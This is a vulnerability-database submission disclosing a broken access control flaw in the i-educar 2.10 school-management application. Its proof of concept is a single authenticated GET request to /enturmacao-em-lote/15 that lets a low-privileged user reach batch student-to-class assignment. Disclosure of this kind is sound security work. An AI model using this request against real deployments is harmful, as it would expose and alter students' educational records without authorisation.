Enviar #644133: Portabilis i-educar 2.10 Broken Access Controlinformación

TítuloPortabilis i-educar 2.10 Broken Access Control
Descripción# Broken Access Control in `/enturmacao-em-lote/[ID]` Endpoint --- ## Summary A **Broken Access Control** vulnerability was identified in the `/enturmacao-em-lote/[ID]` endpoint of the _i-educar_ application. This vulnerability allows users without proper permissions to access restricted functionality, bypassing authorization checks. --- ## Details **Vulnerable Endpoint:** `GET /enturmacao-em-lote/[ID]` **Authentication:** Required The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for . --- ## PoC 1. Authenticate as a non-privileged user. ![[Pasted image 20250821190942.png]] ![[Pasted image 20250821191019.png]] 2. Send the following request:: ``` GET /enturmacao-em-lote/15 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br, zstd Connection: keep-alive Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Priority: u=0, i ``` 3. We could observe that we have access to the page and to the function to batch assign students to classes. And, this user, should not do that. ![[Pasted image 20250821194402.png]] --- ## Impact Broken Access Control vulnerabilities can have severe consequences, including: - Unauthorized access to restricted functionality - Escalation of privileges for low-level users - Exposure of sensitive data and potential system compromise - Loss of confidentiality and integrity of educational records - Reputational damage to the organization
Fuente⚠️ https://github.com/marcelomulder/CVE/blob/main/i-educar/Broken%20Access%20Control%20Vulnerability%20%20in%20%60.enturmacao-em-lote.(ID)%60%20Endpoint.md
Usuario
 marceloQz (UID 87549)
Sumisión2025-08-29 16:21 (hace 8 meses)
Moderación2025-09-07 13:45 (9 days later)
EstadoAceptado
Entrada de VulDB323018 [Portabilis i-Educar hasta 2.10 /enturmacao-em-lote/ escalada de privilegios]
Puntos20

Do you need the next level of professionalism?

Upgrade your account now!